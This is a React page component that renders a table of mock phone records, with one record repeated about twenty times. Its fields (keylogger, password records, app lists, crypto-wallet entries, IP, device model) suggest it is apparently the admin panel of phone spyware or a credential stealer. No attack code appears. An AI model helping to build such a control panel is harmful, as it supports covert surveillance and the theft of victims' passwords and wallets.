import React from "react";
import SearchBar from "../components/DeviceListSeachBar";
import TableWithPagination from "../components/TableWithPagination";

const DeviceList = () => {
  // Mock data for devices (replace with actual fetch logic)
  const deviceData = [
    {
      id: 1,
      //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
      deviceId: "324312be2be17363",
      versionRegion: " 3.5.3/HK 122.90.18.237",
      creationTime: "2024-06-13 13:31:08",
      lastUpdate: "2024-09-14 20:09:01",
      digitalGesture: "Digital/Gesture/Mi...",
      tpBitpe: " tpBitpe-/-",
      imkuCoin: "imkuCoin-/-",
      bobaFox: "bobaFox-/-",
      plusFour: "-/-/-",
      passwordRec: "Password Records",
      keylogger: "Keylogger",
      applicationList: "Application List",
      tags: "Tags: 3",
      brand: "OPPO",
      model: "PEHM00",
      versionParameter: "Version/Parameter: 12/13",
      userId: "User ID",
      accountProxy: "Account/Proxy: / Unassigned",
      nickname: "Nickname:",
      login: "Login:",
      batteryPolicy: "Battery Policy:",
      set: "Set",
      smartAssistant: "Smart Assistant:",
      enabledRunning: "Enabled Runn...",
      settingsStartup: "Settings/Startup mo...",
      hasBeenSet: "has been set. Last ...",
      totalManual: "Total/Manual/Auto S...",
      timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
    },
    {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      {
        id: 1,
        //   disp: <IconBox><IconButton size="small"><EditIcon fontSize="small" /></IconButton></IconBox>,
        deviceId: "324312be2be17363",
        versionRegion: " 3.5.3/HK 122.90.18.237",
        creationTime: "2024-06-13 13:31:08",
        lastUpdate: "2024-09-14 20:09:01",
        digitalGesture: "Digital/Gesture/Mi...",
        tpBitpe: " tpBitpe-/-",
        imkuCoin: "imkuCoin-/-",
        bobaFox: "bobaFox-/-",
        plusFour: "-/-/-",
        passwordRec: "Password Records",
        keylogger: "Keylogger",
        applicationList: "Application List",
        tags: "Tags: 3",
        brand: "OPPO",
        model: "PEHM00",
        versionParameter: "Version/Parameter: 12/13",
        userId: "User ID",
        accountProxy: "Account/Proxy: / Unassigned",
        nickname: "Nickname:",
        login: "Login:",
        batteryPolicy: "Battery Policy:",
        set: "Set",
        smartAssistant: "Smart Assistant:",
        enabledRunning: "Enabled Runn...",
        settingsStartup: "Settings/Startup mo...",
        hasBeenSet: "has been set. Last ...",
        totalManual: "Total/Manual/Auto S...",
        timesAndShutdown: "86 times/37 times/4...\nLast shutdown:",
      },
      
    // ... add more device objects as needed
  ];

  // Styling for margin and spacing
  const containerStyle = {
    padding: "20px",
    margin: "0px 50px",
    maxWidth: "1200px",
  };

  const elementSpacing = {
    marginBottom: "40px",
  };

  return (
    <div style={containerStyle}>
      <div style={elementSpacing}>
        <SearchBar />
      </div>
      <div>
        <TableWithPagination tableType="device" data={deviceData} />
      </div>
    </div>
  );
};

export default DeviceList;
